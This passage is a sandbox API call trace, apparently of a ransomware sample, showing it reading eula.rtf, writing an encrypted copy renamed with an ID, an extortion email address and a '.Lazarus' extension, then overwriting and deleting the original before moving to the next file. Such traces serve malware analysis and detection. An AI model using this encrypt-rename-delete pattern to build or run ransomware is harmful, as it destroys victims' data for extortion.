InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0066.145] AreFileApisANSI () returned 1 [0066.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0066.146] AreFileApisANSI () returned 1 [0066.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0066.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0066.146] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.146] GetFileType (hFile=0x428) returned 0x1 [0066.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.146] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.146] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.146] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.146] CloseHandle (hObject=0x428) returned 1 [0066.147] AreFileApisANSI () returned 1 [0066.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0066.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0066.147] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.147] GetFileType (hFile=0x428) returned 0x1 [0066.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.147] CloseHandle (hObject=0x428) returned 1 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0066.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0066.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0066.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.148] AreFileApisANSI () returned 1 [0066.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b30 [0066.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0066.148] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76)) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0066.148] AreFileApisANSI () returned 1 [0066.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0066.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0066.148] GetLastError () returned 0x0 [0066.148] SetLastError (dwErrCode=0x0) [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0066.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0066.149] GetLastError () returned 0x0 [0066.149] SetLastError (dwErrCode=0x0) [0066.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0066.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0066.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.149] AreFileApisANSI () returned 1 [0066.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0066.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0066.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0066.149] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.241] GetFileType (hFile=0x428) returned 0x1 [0066.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0066.249] AreFileApisANSI () returned 1 [0066.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0066.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0066.250] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.251] GetFileType (hFile=0x420) returned 0x1 [0066.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0066.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0066.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.251] GetLastError () returned 0x0 [0066.251] SetLastError (dwErrCode=0x0) [0066.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.253] GetLastError () returned 0x0 [0066.255] SetLastError (dwErrCode=0x0) [0066.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0066.255] ReadFile (in: hFile=0x420, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f030*=0xe76, lpOverlapped=0x0) returned 1 [0066.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0066.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0066.260] GetLastError () returned 0x0 [0066.260] SetLastError (dwErrCode=0x0) [0066.260] GetLastError () returned 0x0 [0066.260] SetLastError (dwErrCode=0x0) [0066.260] GetLastError () returned 0x0 [0066.260] SetLastError (dwErrCode=0x0) [0066.261] ReadFile (in: hFile=0x420, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.261] GetLastError () returned 0x0 [0066.261] SetLastError (dwErrCode=0x0) [0066.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf90 [0066.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0066.261] GetLastError () returned 0x0 [0066.261] SetLastError (dwErrCode=0x0) [0066.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0066.261] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xe80, lpOverlapped=0x0) returned 1 [0066.262] GetLastError () returned 0x0 [0066.262] SetLastError (dwErrCode=0x0) [0066.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.262] GetLastError () returned 0x0 [0066.262] SetLastError (dwErrCode=0x0) [0066.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0066.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0066.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.262] CloseHandle (hObject=0x428) returned 1 [0066.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.263] CloseHandle (hObject=0x420) returned 1 [0066.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0066.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0066.264] AreFileApisANSI () returned 1 [0066.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0066.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0066.264] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.265] GetFileType (hFile=0x420) returned 0x1 [0066.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0066.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0066.265] GetLastError () returned 0xb7 [0066.265] SetLastError (dwErrCode=0xb7) [0066.265] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.267] CloseHandle (hObject=0x420) returned 1 [0066.267] AreFileApisANSI () returned 1 [0066.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0066.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 36 [0066.267] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.269] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0066.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0066.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0066.270] AreFileApisANSI () returned 1 [0066.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", cchWideChar=-1, 